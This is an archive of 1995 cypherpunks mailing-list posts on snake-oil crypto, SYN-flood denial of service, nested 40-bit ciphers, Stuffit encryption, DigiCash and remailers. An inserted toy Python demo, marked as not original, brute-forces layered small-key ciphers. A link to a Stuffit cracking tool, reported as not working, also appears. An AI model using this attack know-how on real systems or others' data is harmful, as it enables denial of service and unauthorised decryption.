Subject: Elementrix's so-called "Power One Time Pad"
Message-ID: <199510242011.VAA16761@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain


Essentially what these guys are selling is a secret key algorithm in which
the key for any given message is a function of some initial seed value,
and of hashes of all previous messages transmitted between the two parties.
So in theory, to break the code, one would need to know not only their
initial key, but also all of the messages transmitted between them so far.
A similar result can be achieved by encrypting with PCBC, or other feedback
mode involving plaintext, and carrying the IV from the end of one session
to the beginning of the next.  This is not, of course, a one-time pad, and
hardly "groundbreaking" or "revolutionary".

While such a system could be designed securely in theory, the folks at
Elementrix appear to have little experience at designing secure
cryptographic systems.  Cryptographic systems designed by such novices
frequently have bugs in the implementation which weaken the security
offered, or have statistical weaknesses which allow cryptanalytic attack. 
Elementrix has offered no assurances that they have tested their system
for either.  Beware of snake oil.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Lynne L. Harrison" <lharrison@mhv.net>
Date: Tue, 24 Oct 95 18:09:09 PDT
To: cypherpunks@toad.com
Subject: Re: Verification of Registration
Message-ID: <9510250110.AA00113@mhv.net>
MIME-Version: 1.0
Content-Type: text/plain


At 11:02 AM 10/24/95 -0500, you wrote:
>Everybody who receives mail from cypherpunks@toad.com received this
>message because the message was addressed to 
>cypherpunks@toad.com.  Apparently someone may have 
>joined this 'group' or service and used the cypherpunks address as 
>the e-mail address.  Mayhap the cypherpunks@toad.com / cypherpunks
>userid/password. 
>
>This would be my guess, of course.
>
>Does anybody know what this service does?
>

  Makes sense given the numbers that also received the message.
  C|Net has a web site and a weekly program on cable about the Net. I saw it
(the show) once.  Nothing to recommend - silly stuff like URL's for the weather.


Regards -
  Lynne


********************************************************************
Lynne L. Harrison, Esq.
Poughkeepsie, New York 
lharrison@mhv.net

"Say not, 'I have found the truth', but rather, 'I have found a truth.'"
                         - Kahlil Gibran from "The Prophet"
********************************************************************





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Stanton McCandlish <mech@eff.org>
Date: Tue, 24 Oct 95 21:28:42 PDT
To: cypherpunks@toad.com
Subject: QUERY: dc-nets list?
Message-ID: <199510250428.VAA08317@eff.org>
MIME-Version: 1.0
Content-Type: text/plain


Please reply to me (or cc me if you respond to list).

If anyone happens to know where (if anywhere) the dc-nets list has moved 
to, and how to subscribe, I'd really appreciate a pointer. Need to 
update the entry for that in a FAQ I maintain.  TTYL.

--
<HTML><A HREF="http://www.eff.org/~mech/">    Stanton McCandlish
</A><HR><A HREF="mailto:mech@eff.org">        mech@eff.org
</A><P><A HREF="http://www.eff.org/">         Electronic Frontier Foundation
</A><P>       Online Activist    </HTML>



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Simon Spero <ses@tipper.oit.unc.edu>
Date: Tue, 24 Oct 95 21:40:12 PDT
To: Jon Mittelhauser <jonm@netscape.com>
Subject: Re: Does your software?
In-Reply-To: <308D0DA4.7ED@netscape.com>
Message-ID: <Pine.SOL.3.91.951024210756.18616A-100000@chivalry>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 24 Oct 1995, Jon Mittelhauser wrote:

> Dr. Frederick B. Cohen wrote:
> 
> > Yet it services more than one request per minute, 24 hours, 7 days, and
> > has done so without denial of services, corruption, or leakage since its

> I really tried to resist but....
> 

Thanks for saving me from the temptation but I guessed you were so taken 
aback by the performance claims that you missed the most amazing claim: 
an httpd that is proof against Denial Of Service. I'd love to know how 
Dr. Fred does this, since DoS is believed impossible to defend against 
for unauthenticated TCP...

The usual DoS attack is to send a stream of connection-initiating SYNs to 
the target port, and never ACK the returned SYN. This fills up the listen 
queue, and jams the port. As long as you can generate SYNs faster than 
the TCP implementation times out the older pending requests, the port is 
jammed (modulo a small window of, er, invulnerability between one of your 
SYNs timing out and its replacement turning up). 

Ob Crypto:

  Has anybody thought about running Photuris over a TCP connection to do 
application-level key-exchange? The cookie stuff isn't really needed in 
this application, but it's still quite a nice wheel.

Simon

 -----
(defun modexpt (x y n)  "computes (x^y) mod n"
  (cond ((= y 0) 1) 	((= y 1) (mod x n))
	((evenp y) (mod (expt (modexpt x (/ y 2) n) 2) n))
	(t (mod (* x (modexpt x (1- y) n)) n))))





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Nesta Stubbs <nesta@cynico.com>
Date: Tue, 24 Oct 95 20:02:23 PDT
To: "Dr. Frederick B. Cohen" <fc@all.net>
Subject: Re: Netscape Logic Bomb detailed by IETF
In-Reply-To: <9510231413.AA26514@all.net>
Message-ID: <Pine.BSD.3.91.951024214619.20203D-100000@miso.wwa.com>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 23 Oct 1995, Dr. Frederick B. Cohen wrote:

> > Yes, Mr. Anonymous, we all know postscript is dangerous. Thank you for
> > this stunning revelation. We've read the IETF documents before, and
> > some of us even helped write them.
> 
> Then you should support his point which is valid.
> 
I don't think they have vested interests at all.  I think that they are 
able to see that the problem is not with the browser.  You know 
"/bin/login" is insecure because it allows hooks for unpasswded logins, I 
mean if the user wanted to they could leave root unpasswded and if they are 
using "/bin/login" someone could get into their system just like that.

That point is NOT valid IMO.  

> I strongly disagree.  If Netscape provided a way to execute shell
> commands on your host from a remote computer, it would certainly be a
> hole created by their product.  The fact that the default shell is
> potentially dangerous means it's incumbent on those who provide access
> to it to provide adequate protection.
>
NO, postscript provides the method for executing shell commands if you 
accept postscript from anywhere.  Netscape can NEVER be "fool"proof 
against all hardware errors, particularly loose nuts on the keyboard.



Nesta Stubbs		     "Betsy, can you find the Pentagon for me? 
Cynico Network Consulting     It has five sides and a big parking lot" 
nesta@cynico.com			-Fred McMurray-





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Raph Levien <raph@CS.Berkeley.EDU>
Date: Tue, 24 Oct 95 22:13:58 PDT
To: cypherpunks@toad.com
Subject: CJR returned to sender
Message-ID: <199510250513.WAA20962@kiwi.cs.berkeley.edu>
MIME-Version: 1.0
Content-Type: text/plain


   I got the CJR back today, envelope unopened (although the corner was
torn so you could see there were t-shirts inside). "Returned to sender",
it said, "Refused___, Unclaimed___".

   The address on the envelope reads:

ATTN: Samuel L. Capino - 15 day CJR
Defense Trade Analyst
U.S. Dept. of State
Office of Defense Trade Controls
PM/DTC SA-6 Room 200
1701 N. Fort Meyer Drive
Arlington, CA 22209-3113

   Did I do something wrong, or did the Dept. of State decide it
didn't want to deal with this CJR?

Raph




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Sommerfeld <sommerfeld@orchard.medford.ma.us>
Date: Tue, 24 Oct 95 19:48:20 PDT
To: "baldwin" (Robert W. Baldwin) <baldwin@rsa.com>
Subject: Re: 80 bit security from 40 bit exportable products
In-Reply-To: <9509248145.AA814557096@snail.rsa.com>
Message-ID: <199510250243.CAA00966@orchard.medford.ma.us>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

> For example, a web client might fetch an S-HTTP page over an SSL
> protected link via a firewall that supports IPsec tunnels.  That's
> three 40 bit keys protecting the data over the internet link (of
> course, this may not be equivalent to a 120 bit cipher, that depends
> on the details of the cipher systems and independence of the key
> setups).

C'mon Bob.. how long has it been since you picked a lock? :-)

Given the likely presence of known or verifiable plaintext at each
nesting level, a three-deep nesting of 40-bit ciphers like this
probably increases the strength to about, ohh, a 42 bit cipher.

						- Bill


-----BEGIN PGP SIGNATURE-----
Version: 2.6.1

iQCVAwUBMI2kGrT+rHlVUGpxAQEKzwP+N7TlofhbYgHXycj7KCdpLhXFzZpnqlCB
ce/3ng9e4zN9G+lX/zpEeH/muhVkKFOwpaadYBKrn7Mu63dT0guCFNlApo9AMagU
xcLHex5AsKM3tWCayiTN5TP14bxEx2jSR54jSJIKsfulkpYRK0LYGj/fc5mSH8iP
r9qXBCrp7xA=
=QtVF
-----END PGP SIGNATURE-----
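
Added example, not part of the original message: a toy version of the point made above, with three nested layers of a small-key cipher where each layer's plaintext starts with a recognisable marker, so the layers can be searched one at a time. The 12-bit key size, the XOR stream cipher and the layer markers are constructed for the demonstration; `effective_bits` carries the same count over to the 40-bit case.

```python
import hashlib
import math

KEY_BITS = 12   # toy key size so an exhaustive search finishes instantly

# Constructed markers standing in for the recognisable framing each layer
# adds (outermost first). They are not real protocol headers.
LAYERS = [b"IPSEC-HDR:", b"SSL-HDR:", b"SHTTP-HDR:"]


def keystream(key, length):
    """SHA-256 in counter mode, keyed with the small integer key."""
    out = b""
    counter = 0
    while len(out) < length:
        block = key.to_bytes(4, "big") + counter.to_bytes(4, "big")
        out += hashlib.sha256(block).digest()
        counter += 1
    return out[:length]


def crypt(key, data):
    """XOR stream cipher: the same call encrypts and decrypts."""
    return bytes(a ^ b for a, b in zip(data, keystream(key, len(data))))


def nest(message, keys):
    """Encrypt under three layers; keys[0] belongs to the outermost layer."""
    data = message
    for header, key in zip(reversed(LAYERS), reversed(keys)):
        data = crypt(key, header + data)
    return data


def peel(ciphertext):
    """Search each layer's key separately, using its marker as verifiable
    plaintext. Returns (message, recovered_keys, trial_decryptions)."""
    data = ciphertext
    keys = []
    trials = 0
    for header in LAYERS:
        for key in range(2 ** KEY_BITS):
            trials += 1
            # Decrypting the first few bytes is enough to test a candidate.
            if crypt(key, data[:len(header)]) == header:
                keys.append(key)
                data = crypt(key, data)[len(header):]
                break
        else:
            raise ValueError("no key produced the expected marker")
    return data, keys, trials


def effective_bits(key_bits, layers):
    """Work factor in bits when layers are searched one after another:
    layers * 2^key_bits trials instead of 2^(layers * key_bits)."""
    return math.log2(layers * 2 ** key_bits)


if __name__ == "__main__":
    secret_keys = [0xABC, 0x123, 0xFFF]           # constructed sample keys
    ct = nest(b"constructed order: 3 widgets", secret_keys)
    message, found, trials = peel(ct)
    print(message, [hex(k) for k in found], trials)
    print("joint search space: 2^%d" % (3 * KEY_BITS))
    print("3 x 40-bit layers : about %.2f bits" % effective_bits(40, 3))
```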




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mpd@netcom.com (Mike Duvos)
Date: Tue, 24 Oct 95 22:53:32 PDT
To: cypherpunks@toad.com
Subject: Re: Mark Twain Bank (was: Anonymity: A Modest Proposal)
In-Reply-To: <199510241356.GAA01427@jobe.shell.portal.com>
Message-ID: <199510250551.WAA29912@netcom12.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


Someone writes:

 >My
 >understanding is that the _bank account_ is FDIC insured, but not
 >the ECash. I could be wrong -- their materials are extremely confusing
 >and hard to follow.

I read the entire lengthy contract and found quite a few things
which appear to be designed to cover the bank's posterior.

1.  Both parties stipulate that their relationship is a 
    business relationship and not a fiduciary relationship.

2.  Your account is not FDIC insured. 

3.  The bank accepts no liability for anything going wrong, 
    although it may, at its sole option, attempt to make
    amends.

4.  Parties agree to waive a jury trial.

5.  Parties agree to binding arbitration. 

6.  General waffling to the effect that the tiny fees collected
    imply an equally tiny responsibility and potential liability
    on the part of the bank.  

Now most of this language also appears in the fine print of the
First Virtual agreement, so it is not like you have an option
of trading on the Internet under the rules which govern your
ordinary checking account. 

One wonders whether signing away all responsibility on the part of
the bank is going to be the standard for using digital money
on the Internet, or whether consumers will demand protection
when using these new services.  

One has to be careful that when new technology replaces old, the 
privacy protection which applied to the old also applies to the
new.  Good examples of this in the past are the ways in which the 
rights you have to the privacy of paper mail generally fail to 
be extended to Email, and of course "regulation E", which exempted
bank accounts which were capable of Electronic Funds Transfer from
a great deal of the protection which used to govern users of
ordinary checking accounts. 

On the brighter side, Dr. Chaum's success in convincing someone
to back DigiCash with actual US dollars certainly makes advances
in breaking public key cryptography worth a great deal more than the
tiny prizes currently offered by RSADSI. 

It will be interesting to see how this all works out in the
next few months.  Arjen Lenstra is planning on factoring RSA-130
on the Web for a high performance computing conference later this
year.  This should lead to some very robust estimates for the
amount of computing power needed for GNFS to break 512 bit PGP
keys.  

Does anyone know the details of the DigiCash protocol, or how
much computing power it would take someone to make counterfeit coins?  

--
     Mike Duvos         $    PGP 2.6 Public Key available     $
     mpd@netcom.com     $    via Finger.                      $









From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Marshall Clow <mclow@coyote.csusm.edu>
Date: Tue, 24 Oct 95 23:00:16 PDT
To: Jonathon Fletcher <jonathon@doemail.sbi.com>
Subject: Re: Quick commercial package question
Message-ID: <v03003704acb381c20617@[204.250.84.3]>
MIME-Version: 1.0
Content-Type: text/plain


Somebody who might be "Jonathon Fletcher" <jonathon@doemail.sbi.com> said:
>
>  There's a compression/archiving package on the Mac called Stuffit.
>
>  Question is - does anyone know anything about the strength or
>trustability of the encryption algorithm used ? It's freely exportable
>from the US (or so I thought) so it can't be DES. Is it (down) on a level
>with the MS Word or Wordperfect ciphers, or is it a little better ? How
>far should I trust it ?
>
Well, that's an interesting question.
On one hand, it's a proprietary encryption algorithm, written by a bright
17 year old.

On the other hand, there have been no reported cracks, no "decrypt your
encrypted archives" programs like there are for MS Word, or WordPerfect.
(Maybe it's hard, maybe no one cares.)
[ Late breaking news: "t byfield" reported one; it appears not to work. ]

On the gripping hand, there was no trouble getting export approval.

Many people/companies put encrypted Stuffit archives up for anonymous ftp.
(Beta versions of executables, etc)

How far should you trust it?
That's up to you.

-- Marshall
Aladdin Systems, maker of Stuffit Deluxe, etc.

Disclaimer:  There is no way that this can be considered an official
statement of Aladdin Systems.

Marshall Clow
Aladdin Systems
mclow@coyote.csusm.edu
Warning: Objects in calendar are closer than they appear.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Marshall Clow <mclow@coyote.csusm.edu>
Date: Tue, 24 Oct 95 22:58:44 PDT
To: tbyfield@panix.com (t byfield)
Subject: Re: Quick commercial package question
Message-ID: <v03003705acb381e70ed9@[204.250.84.3]>
MIME-Version: 1.0
Content-Type: text/plain


>At 12:34 PM 10/25/95, Jonathon Fletcher wrote:
>>Just a brief question.
>>
>>  There's a compression/archiving package on the Mac called Stuffit. It
>
>        <...>
>
>>from the US (or so I thought) so it can't be DES. Is it (down) on a level
>>with the MS Word or Wordperfect ciphers, or is it a little better ? How
>>far should I trust it ?
>
>        Not at all. Take a look at:
>
>        http://www.uccs.edu/~abusby/mac_u-g/RemoveIt.sit.bin
>
Ted --

Thanks for bringing this to my attention. I wasn't aware of any cracking
program for Stuffit archives. If you know of any others, please let me
know.

I just finished trying this one, though. It doesn't work.

Here's some background on Stuffit archives:
There have been three different formats for Stuffit files over the past 8
(has it really been 8?) years.

1)   Version 1.5.1. The original
2)   Version 2.0    Short lived. No longer used.
3)   Version 3.0    The Current version. First shipped in 1992 (I think)

The crack described at the above URL does not work for 1.5.1 archives.
It also does not work for 3.0 archives.
I don't have any 2.0 archives handy, but I will test them in the morning.

It is possible that the cracking technique described at the above URL will
work for 2.0 archives. However, none of Aladdin's shipping software will
generate 2.0 archives, and Aladdin supplies a (free) converter from 1.5.1
and 2.0 archives to 3.0 archives. (They get smaller when converted, too!)

-- Marshall
Aladdin Systems, maker of Stuffit Deluxe, etc.

Disclaimer:  There is no way that this could possibly be considered an
official statement of Aladdin Systems.


Marshall Clow
Aladdin Systems
mclow@coyote.csusm.edu
Warning: Objects in calendar are closer than they appear.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Olsen <alano@teleport.com>
Date: Tue, 24 Oct 95 23:02:21 PDT
To: cypherpunks@toad.com
Subject: Re: CJR returned to sender
Message-ID: <199510250602.XAA20850@desiree.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


At 10:13 PM 10/24/95 -0700, you wrote:
>   I got the CJR back today, envelope unopened (although the corner was
>torn so you could see there were t-shirts inside). "Returned to sender",
>it said, "Refused___, Unclaimed___".
>
>   Did I do something wrong, or did the Dept. of State decide it
>didn't want to deal with this CJR?

That is what you get for warning people in advance!  (I would say that they
"skirted" the issue, but that is not a-dress-ed here...) Maybe they read the
list and knew what you were up to. Why else would they refuse free t-shirts?
(Or maybe they had already talked with Netscape that week...) ];>

|       Visualize a world without lawyers!        | alano@teleport.com   |
|"The moral PGP Diffie taught Zimmerman unites all| Disclaimer:          |
| mankind free in one-key-steganography-privacy!" | Ignore the man       |
|   -- PGP 2.6.2 key available on request --      |  behind the keyboard.|
|         http://www.teleport.com/~alano          |       <fnord>        |





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Sommerfeld <sommerfeld@orchard.medford.ma.us>
Date: Tue, 24 Oct 95 20:17:57 PDT
To: patrick@verity.com (Patrick Horgan)
Subject: Re: textbooks
In-Reply-To: <9510242121.AA07455@cantina.verity.com>
Message-ID: <199510250308.DAA01044@orchard.medford.ma.us>
MIME-Version: 1.0
Content-Type: text/plain


I meant to bring this up with Charlie Kaufman and Radia Perlman when I
got the book, but never got around to it..

The following line of thinking was inspired by the NSA "patch" to SHA:
the addition of a rotate-left-one-bit operation to each round of SHA,
which yields faster mixing between values in bit positions within the
input.

> The quick proof of why the initial and final permutations add nothing to 
> the security of DES is presented in an informal and quite obvious sidebar.

Actually, I found the proof not completely convincing.  It's really a
proof that it doesn't strengthen the DES against a *known plaintext*
attack, but there are other weaker attacks it may make marginally more
difficult (or easier..); for instance, partially-known plaintext or
some forms of verifiable plaintext.

The FP/IP don't add *much* security, but I'm not about to say that
they add *no* security.

> The comment is made that by the same argument the permutation of the key
> in the generating of per-round keys also adds nothing to security.

Again, their proof assumed that all the bits of the key are
independent and unbiased -- which they will be if you're careful, but
won't be if you're stupid.

Remember that the NSA designs ciphers for use by people with a high
school diploma or less :-).

					- Bill




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Tue, 24 Oct 95 23:21:12 PDT
To: cypherpunks@toad.com
Subject: Re: CJR returned to sender
Message-ID: <acb323bd030210041822@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 5:13 AM 10/25/95, Raph Levien wrote:
>   I got the CJR back today, envelope unopened (although the corner was
>torn so you could see there were t-shirts inside). "Returned to sender",
>it said, "Refused___, Unclaimed___".
>
>   The address on the envelope reads:
>
>ATTN: Samuel L. Capino - 15 day CJR
>Defense Trade Analyst
>U.S. Dept. of State
>Office of Defense Trade Controls
>PM/DTC SA-6 Room 200
>1701 N. Fort Meyer Drive
>Arlington, CA 22209-3113
>
>   Did I do something wrong, or did the Dept. of State decide it
>didn't want to deal with this CJR?

Raph, I mean no offense, but if _any_ request is ever to be deemed
"frivolous," surely submitting a CJR for t-shirts is such a request.

I won't belabor the point that the t-shirt is _at best_ comparable to a
book, which generally needs no CJR (*), and _at worst_ is an illegible,
confusing "work of art." (I personally am miffed at the imprecision of the
"This shirt has been declared to be a munition"--or whatever, as I don't
have one handy to check--and the language of the sales advertisements.)

So the little joke was returned unopened. Not surprising.

No offense intended to all those who think a CJR for a t-shirt is a worthy
cause, but I think it's a pointless diversion.

(* Hal Abelson of MIT says there are possible export problems with the MIT
Press book on PGP, and MIT dropped plans for a version in a special OCR
font. So, I agree that _some_ books cross the line and look like pure
software. However, I continue to maintain that a badly-printed barcode is
just a joke, nothing more.)

--Tim May

Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rah@shipwright.com (Robert Hettinga)
Date: Tue, 24 Oct 95 20:40:18 PDT
To: cypherpunks@toad.com
Subject: Conference Report?
Message-ID: <v02120d00acb3612422ed@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain


Did anyone go to the

"Worldwide Electronic Commerce Law, Policy, Security and Controls Conference" ?

It was in Bethesda October 18 - 20.

Just curious. Sponsored by a lot of Big Cheese (ABA, HLS, NIST, UNCITL,
SPA, ETC, ETC, ETC).

Cheers,
Bob Hettinga

-----------------
Robert Hettinga (rah@shipwright.com)
Shipwright Development Corporation, 44 Farquhar Street, Boston, MA 02131
USA (617) 323-7923
"Reality is not optional." --Thomas Sowell
>>>>Phree Phil: Email: zldf@clark.net  http://www.netresponse.com/zldf <<<<<






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@homeport.org>
Date: Tue, 24 Oct 95 21:08:14 PDT
To: jonathon@doemail.sbi.com (Jonathon Fletcher)
Subject: Re: Quick commercial package question
In-Reply-To: <Pine.SUN.3.91.951025122602.8492M-100000@doe905f>
Message-ID: <199510250410.AAA24053@homeport.org>
MIME-Version: 1.0
Content-Type: text


Jonathon Fletcher wrote:
| 
|   There's a compression/archiving package on the Mac called Stuffit. It
| comes in the usual Lite (get free then register) and Deluxe (money first,
| product later) flavours. It offers, amongst its options, an encryption
| option on a 'per archive entry'. This means you can have an archive with a
| mix of encrypted and unencrypted files and folders, all in the same
| archive. 
| 
|   Question is - does anyone know anything about the strength or
| trustability of the encryption algorithm used ? It's freely exportable
| from the US (or so I thought) so it can't be DES. Is it (down) on a level
| with the MS Word or Wordperfect ciphers, or is it a little better ? How
| far should I trust it ? 

	It's a 40 bit watered down version of DES.  Stuffit 2 included
DES, so Aladdin is aware of strong crypto, but the cost of shipping
two versions was too high.

Adam

-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.org>
Date: Wed, 25 Oct 95 00:31:22 PDT
To: tcmay@got.net (Timothy C. May)
Subject: Re: CJR returned to sender
In-Reply-To: <acb323bd030210041822@[205.199.118.202]>
Message-ID: <199510250726.AAA10170@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


> software. However, I continue to maintain that a badly-printed barcode is
> just a joke, nothing more.)
> 

	Whether the t-shirt is a joke or not is irrelevant. If I shoot
someone, as a joke, that doesn't mean I shouldn't go to jail for it.
Unless the crypto export laws and the laws surrounding CJRs have a
provision for 'jokes', then the return of Raph's properly formed CJR
request seems to me rather, um, illegal?

	The law, in my opinion, is a joke. Does that mean I can ignore
it?

-- 
sameer						Voice:   510-601-9777
Community ConneXion				FAX:     510-601-9734
The Internet Privacy Provider			Dialin:  510-658-6376
http://www.c2.org (or login as "guest")			sameer@c2.org




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "P.J. Ponder" <ponder@wane-leon-mail.scri.fsu.edu>
Date: Tue, 24 Oct 95 21:29:15 PDT
To: cypherpunks@toad.com
Subject: re: Remailer-in-a-Box, Everyone a Remailer
Message-ID: <Pine.3.89.9510242313.E16314-0100000@wane3.scri.fsu.edu>
MIME-Version: 1.0
Content-Type: text/plain



I think someone claiming to be Jay Campbell wrote:

>Rather, a single physical machine site can and should be able to run many
>remailers, out of user accounts. (Accounts on systems like Sameer's C2. Or
>Hal's remailer running on Portal. Or maybe some of the Mixmaster clients.)

>This also brings up the idea of 'opportunistic remailers' again (somebody
>gimme a snazzy name for that) - a PC/Mac-based SMTPish server that isn't

  how about pop-ups?  This has a real future, I think.  It would be easy 
enough to leave one's pc logged in for a while (maybe even earn a little 
ebread with it?) and forward some mail around, after checking with the 
server to see if there were any new messages for the cypherpunks password 
screen saver or any anon posts to be remailed.

--
pj 

p.s. seems like the list is getting a little hard-edged as TCMay pointed 
out recently.  Everybody jumping on everyone else, and on their products, 
too.  I want secure and powerful tools, too.  But it seems like a feeding 
frenzy.  And as soon as someone posts on something a little askew, right 
back come the replies to cut the shit and get back on the topic.
I say lighten up.   <EOF>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tbyfield@panix.com (t byfield)
Date: Tue, 24 Oct 95 21:44:15 PDT
To: Jonathon Fletcher <jonathon@doemail.sbi.com>
Subject: Re: Quick commercial package question
Message-ID: <v02120d01acb37e66a981@DialupEudora>
MIME-Version: 1.0
Content-Type: text/plain


At 12:34 PM 10/25/95, Jonathon Fletcher wrote:
>Just a brief question.
>
>  There's a compression/archiving package on the Mac called Stuffit. It

        <...>

>from the US (or so I thought) so it can't be DES. Is it (down) on a level
>with the MS Word or Wordperfect ciphers, or is it a little better ? How
>far should I trust it ?

        Not at all. Take a look at:

        http://www.uccs.edu/~abusby/mac_u-g/RemoveIt.sit.bin

Ted






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Tue, 24 Oct 95 22:42:36 PDT
To: cypherpunks@toad.com
Subject: Re: Hack DigiCash: Payee Anonymity
Message-ID: <199510250540.BAA23454@book.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In article <199510240750.IAA04175@utopia.hacktic.nl>,
anon-remailer@utopia.hacktic.nl (Name Withheld by Request) wrote:

> Well, Sameer is offering a "Hack DigiCash" promotion, in the same spirit as
> the hack Netscape and Microsoft offer.  However, Chaum is a fairly
> experienced cryptographer, and I doubt that there are any major security
> flaws in the system.  The trial version used RSAREF, so that code at least
> was open for your inspection.  There is still the possibility of bugs
> creeping in when porting to different platforms tho...
> 
> I think the most interesting hack to pursue is to eliminate the
> payee-nonanonymity problem.  The current software uses the following
> protocol:
[protocol elided]

Payee anonymity will never be integrated into the protocol for political
reasons. Still, it is trivial to do this with current Ecash by setting up
a repayer site. I'll release some perl scipts doing just that as soon as
my current project is over (~2-3 weeks).
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBMI3N1CoZzwIn1bdtAQFsNQF/ZxwblP0YIUE47oXukUuSCA0ymeVexjGc
d7AA0efbzER+xKYvjtwppTGoWG+GiNzx
=35an
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: edgar@highnrg.sbay.org (Edgar Swank)
Date: Wed, 25 Oct 95 02:25:09 PDT
To: cypherpunks@toad.com
Subject: Re: Anonymity: A Modest Proposal
Message-ID: <wwRiDD8w165w@highnrg.sbay.org>
MIME-Version: 1.0
Content-Type: text/plain


Herb Sutter comments on Modemac's proposal,

    At 04:58 10.18.1995 -0700, Modemac wrote:
    >     1) A person writes a message and encrypts it with PGP.

    Using a set public key?  Which would mean the remailers all share
    the same pub/pri key pair (or pieces thereof)?  You'll have to
    come up with a good way of maintaining this secret, since if
    you're not careful it could be compromised by something as simple
    as an attacker's trying to attach a new remailer to the remailer
    group or physically attack any existing remailer.

But using a shared key isn't necessary.  Each remailer can have its
own key.  The message can be encrypted using PGP's function of
encrypting with multiple public keys.

PGP versions 2.63ui and 2.6.3i, now under development, will even have
the ability to encrypt to a whole -file- of keys, one key per line.

Message senders can use all the scanning remailer keys, or some
subset. Scanners will either skip over or forward msgs they can't
decrypt.

Also keep in mind that under this first layer of encryption is just
the address of another remailer, which could, in turn, either forward
to another remailer, or back to the anon newsgroup.

---
edgar@HighNRG.sbay.org
Keep Freestyle Alive!




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: an370736@anon.penet.fi
Date: Tue, 24 Oct 95 18:59:00 PDT
To: cypherpunks@toad.com
Subject: Get rid of this stuff, please...
Message-ID: <199510241739.RAA14033@gears.efn.org>
MIME-Version: 1.0
Content-Type: text/plain


To: cypherpunks@toad.com
Subject: Re: Welcome to c|net
From: anon-remailer@utopia.hacktic.nl (Name Withheld by Request)
Date: Tue, 24 Oct 1995 20:10:07 +0100

> From cypherpunks@toad.com  Tue Oct 24 09:03:00 1995
> Received: from cnet.com (central.cnet.com [204.188.123.10]) by
>  orpheum.cnet.com (8.6.12/8.6.12) with ESMTP id JAA10708 for
>  <verify@orpheum.cnet.com>; Tue, 24 Oct 1995 09:03:00 -0700
> Received: from longs.lance.colostate.edu by cnet.com via ESMTP
>  (8.6.12/940518.SGI.central)
>         for <verify@cnet.com> id OAA10916; Tue, 24 Oct 1995 14:53:01
GMT
> Received: from [204.131.233.49] (p49.Denver1.dialup.csn.net
>  [204.131.233.49]) by longs.lance.colostate.edu (8.6.12/8.6.5a
(LANCE
>  Revision: 1.3)) with SMTP id KAA07689 for <verify@cnet.com>; Tue,
24 Oct
>  1995 10:02:06 -0600

To Someone in charge. Please UNSUBSCRIBE to this stuff for us, please.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tbyfield@panix.com (t byfield)
Date: Tue, 24 Oct 95 23:13:33 PDT
To: Marshall Clow <mclow@coyote.csusm.edu>
Subject: Re: Quick commercial package question
Message-ID: <v02120d01acb392eb7af2@DialupEudora>
MIME-Version: 1.0
Content-Type: text/plain


Marshall Clow wrote not-on-behalf-of-Aladdin-Systems:

>I just finished trying this one, though. It doesn't work.

        That's not really surprising, since the "version controls" on
cracks are dubious to say the least; whether it's just bogus, a mangled
version, or whatever, is anyone's guess. There are probably others around,
maybe just as effective; if I run across any more, I'll forward them to
you.

>Disclaimer:  There is no way that this could possibly be considered an
>official statement of Aladdin Systems.

        <heh heh>

Ted






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: guthery@austin.sar.slb.com
Date: Wed, 25 Oct 95 01:20:25 PDT
To: rah@shipwright.com
Subject: IT View of Worldwide Electronic Commerce Conference
Message-ID: <9510250820.AA05781@asterix>
MIME-Version: 1.0
Content-Type: text/plain


Robert Hettinga wonders ...

>Did anyone go to the
>
>"Worldwide Electronic Commerce Law, Policy, Security and Controls Conference" ?
>
>It was in Bethesda October 18 - 20.
>
>Just curious. Sponsored by a lot of Big Cheese (ABA, HLS, NIST, UNCITL,
